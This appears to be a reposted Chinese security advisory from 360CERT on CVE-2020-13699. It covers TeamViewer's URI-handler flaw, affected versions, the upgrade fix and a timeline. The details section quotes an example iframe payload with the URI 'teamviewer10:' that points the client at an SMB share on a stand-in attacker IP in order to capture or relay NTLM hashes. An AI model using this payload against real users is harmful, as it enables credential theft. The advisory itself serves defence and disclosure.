欢迎光临
我们一直在努力

CVE-2020-13699:TeamViewer 用户密码破解漏洞通告

 

0x01 漏洞简述

2020年08月10日, 360CERT监测发现 TeamViewer官方 发布了 TeamViewer URL 处理 的风险通告,该漏洞编号为 CVE-2020-13699,漏洞等级:高危,漏洞评分:8.8分

TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时,可能会被黑客利用。

对此,360CERT建议广大用户及时将TeamViewer升级到15.8.3版本,下载地址为:Previous TeamViewer versions 10 – 11 – 12 – 13 – 14 。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

 

0x02 风险等级

360CERT对该漏洞的评定结果如下

评定方式 等级
威胁等级 高危
影响面 广泛
360CERT评分 8.8分

 

0x03 漏洞详情

TeamViewer主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享、网络会议、文件传输等)。

TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的系统访问恶意创建的网站时,可能会被利用,攻击者可以使用精心制作的URL(iframe src='teamviewer10: --play \attacker-IPsharefake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。Windows在打开SMB共享时将执行NTLM身份验证,并且可以将请求进行转发(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解)。

 

0x04 影响版本

  • TeamViewer < 8.0.258861
  • TeamViewer < 9.0.28860
  • TeamViewer < 10.0.258873
  • TeamViewer < 11.0.258870
  • TeamViewer < 12.0.258869
  • TeamViewer < 13.2.36220
  • TeamViewer < 14.2.56676
  • TeamViewer < 15.8.3

 

0x05 修复建议

通用修补建议:

升级到15.8.3版本,下载地址为:Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

 

0x06 相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘,发现TeamViewer在 全球 均有广泛使用,具体分布如下图所示。

 

0x07 产品侧解决方案

360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段,对该类漏洞进行监测,请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。

 

0x08 时间线

2020-08-06 TeamViewer发布通告

2020-08-10 360CERT发布通告

 

0x09 参考链接

  1. Statement on CVE 2020-13699
  2. TeamViewer flaw could be exploited to crack users’ password
赞(0) 打赏
未经允许不得转载:中国宏阔黑客联盟|白帽黑客|网络渗透技术|网站安全|移动安全|通信安全 » CVE-2020-13699:TeamViewer 用户密码破解漏洞通告
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏